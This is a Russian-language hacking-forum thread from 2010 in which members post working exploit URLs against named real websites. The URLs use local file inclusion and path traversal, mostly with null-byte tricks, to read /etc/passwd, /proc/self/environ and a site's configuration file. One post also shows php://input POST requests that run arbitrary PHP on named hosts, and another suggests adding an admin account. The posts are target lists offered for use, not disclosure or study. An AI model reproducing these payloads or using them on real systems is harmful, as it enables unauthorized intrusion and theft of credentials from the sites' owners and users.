HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1181  
Старый 19.08.2010, 04:09
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://sims2pack.modthesims2.com/index.php?page=../index

расширение так и не смог отрезать

-----

http://www.suprapolix.com/index.php?page=../index.php%00

-----

http://www.opticaldocumentsecurity.com/index.php?page=../../../../../../../../../../../../proc/self/environ
 
Ответить с цитированием

  #1182  
Старый 22.08.2010, 02:26
Unknown
Guest
Сообщений: n/a
Провел на форуме:
6079

Репутация: 9
По умолчанию

Довольно известная мобильная социальная сеть GyPSii

Код:
Code:
http://www.gypsii.com/reader.cgi?id=../../../../../../../../etc/passwd%00
PR - 5
 
Ответить с цитированием

  #1183  
Старый 22.08.2010, 13:14
nullik
Новичок
Регистрация: 26.02.2010
Сообщений: 7
Провел на форуме:
14486

Репутация: 0
По умолчанию

http://corporatedatinginternational.com/index.php?page=../../../../../etc/passwd
 
Ответить с цитированием

  #1184  
Старый 23.08.2010, 04:17
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

BANCO CENTRAL DEL ECUADOR

http://www.bce.fin.ec/docs.php?path=/docs.php
 
Ответить с цитированием

  #1185  
Старый 24.08.2010, 02:21
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.quantum-electron.ru/pa.phtml?page=../../../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #1186  
Старый 29.08.2010, 14:40
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

Код:
Code:
http://www.alushta.ua/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #1187  
Старый 30.08.2010, 12:07
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Ну, собственно, и мои пять копеек

Цитата:
Сообщение от None  
http://www.wesoma.de/index.php?include=../../../../../../etc/passwd%00
 
Ответить с цитированием

  #1188  
Старый 30.08.2010, 14:05
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Код:
Code:
http://polyakovprud.dp.ua/index.php?page=/../../../../../../../../../proc/self/environ
Код:
Code:
http://mir-audio.com.ua/admin/file_manager.php/login.php?action=download&filename=includes/configure.php
для последнего: /showthread.php?t=71111 можно админа добавить и тупо под ним зайти
 
Ответить с цитированием

  #1189  
Старый 30.08.2010, 23:35
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

php://input

выполнение произвольного php - кода, редко вижу.

итак, выполняем следующие пост-запросы:

Код:
Code:
POST /index.php?link=php://input HTTP/1.1
Host: www.alternativeautosource.net
Content-Length: 19
Код:
Code:
POST /lang_de/main.php?view=php://input HTTP/1.1
Host: www.galvania.ca
Content-Length: 19
Код:
Code:
POST /page_en.php?link=php://input HTTP/1.1
Host: www.rochelle.cz
Content-Length: 19
и видим PHPINFO серверов

Код:
Code:
POST /WWW/main.php?CONTENT=php://input HTTP/1.1
Host: polyplast-mainz.de
Content-Length: 27
а тут листинг директории))
 
Ответить с цитированием

  #1190  
Старый 31.08.2010, 12:18
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

Код HTML:
HTML:
http://www.sexycamnow.com/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
Код HTML:
HTML:
http://grindhouze.com/cms/index.php/recent/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
Код HTML:
HTML:
http://www.semiprice.fr/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ